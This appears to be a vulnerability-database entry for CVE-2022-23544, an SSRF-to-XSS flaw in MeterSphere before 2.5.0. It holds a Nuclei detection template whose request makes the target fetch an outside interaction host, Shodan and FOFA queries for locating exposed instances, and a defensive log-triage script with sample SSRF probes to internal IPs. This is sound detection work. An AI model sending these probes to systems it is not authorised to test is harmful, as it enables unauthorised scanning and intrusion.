NUCLEI:CVE-2022-23544 (nuclei, ProjectDiscovery)
Jun 16, 2023 - 7:48 p.m.

MeterSphere < 2.5.0 SSRF

2023-06-16 19:48:01
ProjectDiscovery
github.com
Tags: metersphere, ssrf, vulnerability, cross-site scripting, issueproxyresourceservice, internal resources, javascript code

CVSS3: 7.2 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

AI Score: 6.6 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 44.7%)

MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a server-side request forgery (SSRF) that leads to cross-site scripting (XSS). The SSRF in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources and, through the resulting reflected XSS, to execute JavaScript code in the context of MeterSphere's origin in a victim's browser. This vulnerability has been fixed in v2.5.0. There are no known workarounds.

id: CVE-2022-23544

info:
  name: MeterSphere < 2.5.0 SSRF
  author: j4vaovo
  severity: medium
  description: |
    MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23544
    - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj
    - https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23544
    cwe-id: CWE-918,CWE-79
    epss-score: 0.00094
    epss-percentile: 0.3975
    cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: metersphere
    product: metersphere
    shodan-query:
      - html:"metersphere"
      - http.html:"metersphere"
    fofa-query:
      - title="MeterSphere"
      - body="metersphere"
      - title="metersphere"
  tags: cve2022,cve,metersphere,ssrf,oast,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/resource/md/get/url?url=http://oast.pro"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022064c48dbddea6759a4b1d98387f4741e455f2719c480890a557f43459af8d86db02202c998413ed0cf079539aa5f86471364ed714c32e12b13eeb93d7c149d7240dad:922c64590222798bb761d5b6d8e72950
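
A defender-side complement to the template above, added here as an example (it is not part of the original page or of the ProjectDiscovery template): it scans access logs for requests to the endpoint the template probes and classifies the URL the server was asked to fetch. The function names, the combined log format and the sample lines are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint requested by the template above (suffix match allows a path prefix).
PROXY_PATH = "/resource/md/get/url"
# Assumption: the front-end server writes common/combined-format access logs.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_target(url):
    """Classify the URL the server was asked to fetch on the caller's behalf."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "malformed"
    if parts.scheme not in ("http", "https"):
        return "non-http-scheme"
    host = (parts.hostname or "").lower()
    if not host:
        return "malformed"
    if host == "localhost":
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unresolved-host"  # a DNS name; resolve it before trusting it
    return "external" if ip.is_global else "internal"

def triage(lines):
    """Return (client, status, fetched_url, verdict) for every proxy request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        if not path.rstrip("/").endswith(PROXY_PATH):
            continue
        for url in parse_qs(query).get("url", []):  # parse_qs percent-decodes
            hits.append((m["client"], int(m["status"]), url, classify_target(url)))
    return hits

SAMPLE_LOG = [  # constructed lines, not taken from a real system
    '203.0.113.7 - - [16/Jun/2023:19:48:01 +0000] "GET /resource/md/get/url?url=http://127.0.0.1:8081/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Jun/2023:19:48:05 +0000] "GET /resource/md/get/url?url=http%3A%2F%2F10.0.0.5%2Fstatus HTTP/1.1" 200 90',
    '198.51.100.9 - - [16/Jun/2023:19:50:11 +0000] "GET /resource/md/get/url?url=https://img.example.org/a.png HTTP/1.1" 200 2048',
    '198.51.100.9 - - [16/Jun/2023:19:51:00 +0000] "GET /login HTTP/1.1" 200 1024',
]
```

Calling `triage(SAMPLE_LOG)` returns three hits; on a pre-2.5.0 instance, any `internal` verdict with a 200 status is worth investigating first.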
